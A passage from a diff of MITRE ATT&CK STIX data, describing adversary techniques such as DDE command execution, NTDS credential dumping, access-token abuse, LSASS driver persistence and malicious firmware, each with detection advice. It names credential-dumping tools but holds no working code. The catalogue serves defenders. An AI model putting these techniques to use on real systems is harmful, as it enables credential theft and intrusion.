to identify additional samples associated with the adversary and identify development patterns over time.\n\nConsider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf", + "created": "2020-10-01T01:30:00.877Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1587", + "external_id": "T1587" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "Kaspersky Sofacy", + "description": "Kaspersky Lab's Global Research and Analysis Team. (2015, December 4). Sofacy APT hits high profile targets with updated toolset. Retrieved December 10, 2015.", + "url": "https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/" + }, + { + "source_name": "Bitdefender StrongPity June 2020", + "description": "Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.", + "url": "https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf" + }, + { + "source_name": "Talos Promethium June 2020", + "description": "Mercer, W. et al. (2020, June 29). PROMETHIUM extends global reach with StrongPity3 APT. Retrieved July 20, 2020.", + "url": "https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html" + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Dynamic Data Exchange", + "description": "Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\n\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\n\nAdversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "OLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)\n\nMonitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.\n\nMonitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1173", + "external_id": "T1173" + }, + { + "source_name": "BleepingComputer DDE Disabled in Word Dec 2017", + "description": "Cimpanu, C. (2017, December 15). Microsoft Disables DDE Feature in Word to Prevent Further Malware Attacks. Retrieved December 19, 2017.", + "url": "https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/" + }, + { + "source_name": "Microsoft ADV170021 Dec 2017", + "description": "Microsoft. (2017, December 12). ADV170021 - Microsoft Office Defense in Depth Update. Retrieved February 3, 2018.", + "url": "https://portal.msrc.microsoft.com/security-guidance/advisory/ADV170021" + }, + { + "source_name": "Microsoft DDE Advisory Nov 2017", + "description": "Microsoft. (2017, November 8). Microsoft Security Advisory 4053440 - Securely opening Microsoft Office documents that contain Dynamic Data Exchange (DDE) fields. Retrieved November 21, 2017.", + "url": "https://technet.microsoft.com/library/security/4053440" + }, + { + "source_name": "SensePost PS DDE May 2016", + "description": "El-Sherei, S. (2016, May 20). PowerShell, C-Sharp and DDE The Power Within. Retrieved November 22, 2017.", + "url": "https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/" + }, + { + "source_name": "Kettle CSV DDE Aug 2014", + "description": "Kettle, J. (2014, August 29). Comma Separated Vulnerabilities. Retrieved November 22, 2017.", + "url": "https://www.contextis.com/blog/comma-separated-vulnerabilities" + }, + { + "source_name": "Enigma Reviving DDE Jan 2018", + "description": "Nelson, M. (2018, January 29). Reviving DDE: Using OneNote and Excel for Code Execution. Retrieved February 3, 2018.", + "url": "https://posts.specterops.io/reviving-dde-using-onenote-and-excel-for-code-execution-d7226864caee" + }, + { + "source_name": "SensePost MacroLess DDE Oct 2017", + "description": "Stalmans, E., El-Sherei, S. (2017, October 9). Macro-less Code Exec in MSWord. Retrieved November 21, 2017.", + "url": "https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/" + }, + { + "source_name": "NVisio Labs DDE Detection Oct 2017", + "description": "NVISO Labs. (2017, October 11). Detecting DDE in MS Office documents. Retrieved November 21, 2017.", + "url": "https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-28T14:41:38.908Z", + "name": "NTDS", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in %SystemRoot%\\NTDS\\Ntds.dit of a domain controller.(Citation: Wikipedia Active Directory)\n\nIn addition to looking for NTDS files on active Domain Controllers, adversaries may search for backups that contain the same or similar information.(Citation: Metcalf 2015)\n\nThe following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.\n\n* Volume Shadow Copy\n* secretsdump.py\n* Using the in-built Windows tool, ntdsutil.exe\n* Invoke-NinjaCopy\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Ed Williams, Trustwave, SpiderLabs" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "x_mitre_system_requirements": [ + "Access to Domain Controller or backup" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", + "created": "2020-02-11T18:42:35.572Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1003/003", + "external_id": "T1003.003" + }, + { + "source_name": "Metcalf 2015", + "description": "Metcalf, S. (2015, January 19). Attackers Can Now Use Mimikatz to Implant Skeleton Key on Domain Controllers & BackDoor Your Active Directory Forest. Retrieved February 3, 2015.", + "url": "http://adsecurity.org/?p=1275" + }, + { + "source_name": "Wikipedia Active Directory", + "description": "Wikipedia. (2018, March 10). Active Directory. Retrieved April 11, 2018.", + "url": "https://en.wikipedia.org/wiki/Active_Directory" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "SNMP (MIB Dump)", + "description": "Adversaries may target the Management Information Base (MIB) to collect and/or mine valuable information in a network managed using Simple Network Management Protocol (SNMP).\n\nThe MIB is a configuration repository that stores variable information accessible via SNMP in the form of object identifiers (OID). Each OID identifies a variable that can be read or set and permits active management tasks, such as configuration changes, through remote modification of these variables. SNMP can give administrators great insight in their systems, such as, system information, description of hardware, physical location, and software packages(Citation: SANS Information Security Reading Room Securing SNMP Securing SNMP). The MIB may also contain device operational information, including running configuration, routing table, and interface details.\n\nAdversaries may use SNMP queries to collect MIB content directly from SNMP-managed devices in order to collect network information that allows the adversary to build network maps and facilitate future targeted exploitation.(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog Legacy Device Attacks) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Network" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ee7ff928-801c-4f34-8a99-3df965e581a5", + "created": "2020-10-19T23:51:05.953Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1602/001", + "external_id": "T1602.001" + }, + { + "source_name": "SANS Information Security Reading Room Securing SNMP Securing SNMP", + "description": "Michael Stump. (2003). Information Security Reading Room Securing SNMP: A Look atNet-SNMP (SNMPv3). Retrieved October 19, 2020.", + "url": "https://www.sans.org/reading-room/whitepapers/networkdevs/securing-snmp-net-snmp-snmpv3-1051" + }, + { + "source_name": "US-CERT-TA18-106A", + "description": "US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-106A" + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954" + }, + { + "source_name": "Cisco Advisory SNMP v3 Authentication Vulnerabilities", + "description": "Cisco. (2008, June 10). Identifying and Mitigating Exploitation of the SNMP Version 3 Authentication Vulnerabilities. Retrieved October 19, 2020.", + "url": "https://tools.cisco.com/security/center/content/CiscoAppliedMitigationBulletin/cisco-amb-20080610-SNMPv3" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Steganography", + "description": "Adversaries may use steganographic techniques to hide command and control traffic to make detection efforts more difficult. Steganographic techniques can be used to hide data in digital messages that are transferred between systems. This hidden information can be used for command and control of compromised systems. In some cases, the passing of files embedded using steganography, such as image or document files, can be used for command and control. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", + "created": "2020-03-15T00:37:58.963Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1001/002", + "external_id": "T1001.002" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Malicious Link", + "description": "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to download files that require execution via [Malicious File](https://attack.mitre.org/techniques/T1204/002).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Inspect network traffic for indications that a user visited a malicious site, such as links included in phishing campaigns directed at your organization.\n\nAnti-virus can potentially detect malicious documents and files that are downloaded from a link and executed on the user's computer.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", + "created": "2020-03-11T14:43:31.706Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1204/001", + "external_id": "T1204.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:13.531Z", + "name": "Module Firmware", + "description": "Adversaries may install malicious or vulnerable firmware onto modular hardware devices. Control system devices often contain modular hardware devices. These devices may have their own set of firmware that is separate from the firmware of the main control system equipment. \n\nThis technique is similar to [System Firmware](https://attack.mitre.org/techniques/T0857), but is conducted on other system components that may not have the same capabilities or level of integrity checking. Although it results in a device re-image, malicious device firmware may provide persistent access to remaining devices. (Citation: Daniel Peck, Dale Peterson January 2009) \n\nAn easy point of access for an adversary is the Ethernet card, which may have its own CPU, RAM, and operating system. The adversary may attack and likely exploit the computer on an Ethernet card. Exploitation of the Ethernet card computer may enable the adversary to accomplish additional attacks, such as the following: (Citation: Daniel Peck, Dale Peterson January 2009) \n\n* Delayed Attack - The adversary may stage an attack in advance and choose when to launch it, such as at a particularly damaging time. \n* Brick the Ethernet Card - Malicious firmware may be programmed to result in an Ethernet card failure, requiring a factory return. \n* Random Attack or Failure - The adversary may load malicious firmware onto multiple field devices. Execution of an attack and the time it occurs is generated by a pseudo-random number generator. \n* A Field Device Worm - The adversary may choose to identify all field devices of the same model, with the end goal of performing a device-wide compromise. \n* Attack Other Cards on the Field Device - Although it is not the most important module in a field device, the Ethernet card is most accessible to the adversary and malware. Compromise of the Ethernet card may provide a more direct route to compromising other modules, such as the CPU module.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impair-process-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Firmware: Firmware Modification" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0839", + "external_id": "T0839" + }, + { + "source_name": "Daniel Peck, Dale Peterson January 2009", + "description": "Daniel Peck, Dale Peterson 2009, January 28 Leveraging Ethernet Card Vulnerabilities in Field Devices Retrieved. 2017/12/19 ", + "url": "https://www.researchgate.net/publication/228849043_Leveraging_ethernet_card_vulnerabilities_in_field_devices" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-28T15:43:18.080Z", + "name": "Application Access Token", + "description": "Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.\n\nApplication access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) \n\nOAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)\n\nFor example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a \"refresh\" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)\n\nCompromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)\n\nDirect API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Shailesh Tiwary (Indian Army)", + "Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)", + "Jeff Sakowicz, Microsoft Identity Developer Platform Services (IDPM Services)", + "Mark Wee", + "Ian Davila, Tidal Cyber", + "Dylan Silva, AWS Security", + "Jack Burns, HubSpot", + "Blake Strom, Microsoft Threat Intelligence", + "Pawel Partyka, Microsoft Threat Intelligence" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor access token activity for abnormal use and permissions granted to unusual or suspicious applications and APIs. Additionally, administrators should review logs for calls to the AWS Security Token Service (STS) and usage of GCP service accounts in order to identify anomalous actions.(Citation: AWS Logging IAM Calls)(Citation: GCP Monitoring Service Account Usage)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Office 365", + "SaaS", + "Google Workspace", + "Containers", + "IaaS", + "Azure AD" + ], + "x_mitre_version": "1.6", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "System Access Controls" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f005e783-57d4-4837-88ad-dbe7faee1c51", + "created": "2020-01-30T17:37:22.261Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1550/001", + "external_id": "T1550.001" + }, + { + "source_name": "Crowdstrike AWS User Federation Persistence", + "description": " Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.", + "url": "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/" + }, + { + "source_name": "Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019", + "description": "Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.", + "url": "https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/" + }, + { + "source_name": "AWS Logging IAM Calls", + "description": "AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html" + }, + { + "source_name": "AWS Temporary Security Credentials", + "description": "AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html" + }, + { + "source_name": "Microsoft Identity Platform Access 2019", + "description": "Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.", + "url": "https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens" + }, + { + "source_name": "Google Cloud Service Account Credentials", + "description": "Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.", + "url": "https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials" + }, + { + "source_name": "GCP Monitoring Service Account Usage", + "description": "Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.", + "url": "https://cloud.google.com/iam/docs/service-account-monitoring" + }, + { + "source_name": "okta", + "description": "okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.", + "url": "https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen" + }, + { + "source_name": "Rhino Security Labs Enumerating AWS Roles", + "description": "Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.", + "url": "https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration" + }, + { + "source_name": "Staaldraad Phishing with OAuth 2017", + "description": "Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.", + "url": "https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "LSASS Driver", + "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. ", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "SYSTEM", + "Administrator" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", + "created": "2020-01-24T18:38:55.801Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1547/008", + "external_id": "T1547.008" + }, + { + "source_name": "Microsoft LSA Protection Mar 2014", + "description": "Microsoft. (2014, March 12). Configuring Additional LSA Protection. Retrieved November 27, 2017.", + "url": "https://technet.microsoft.com/library/dn408187.aspx" + }, + { + "source_name": "Microsoft DLL Security", + "description": "Microsoft. (n.d.). Dynamic-Link Library Security. Retrieved November 27, 2017.", + "url": "https://msdn.microsoft.com/library/windows/desktop/ff919712.aspx" + }, + { + "source_name": "Microsoft Security Subsystem", + "description": "Microsoft. (n.d.). Security Subsystem Architecture. Retrieved November 27, 2017.", + "url": "https://technet.microsoft.com/library/cc961760.aspx" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-08-14T15:53:00.999Z", + "name": "Service Execution", + "description": "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and [Net](https://attack.mitre.org/software/S0039).\n\n[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and sc.exe can accept remote servers as arguments and may be used to conduct remote execution.\n\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Changes to service Registry entries and command line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool [PsExec](https://attack.mitre.org/software/S0029).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 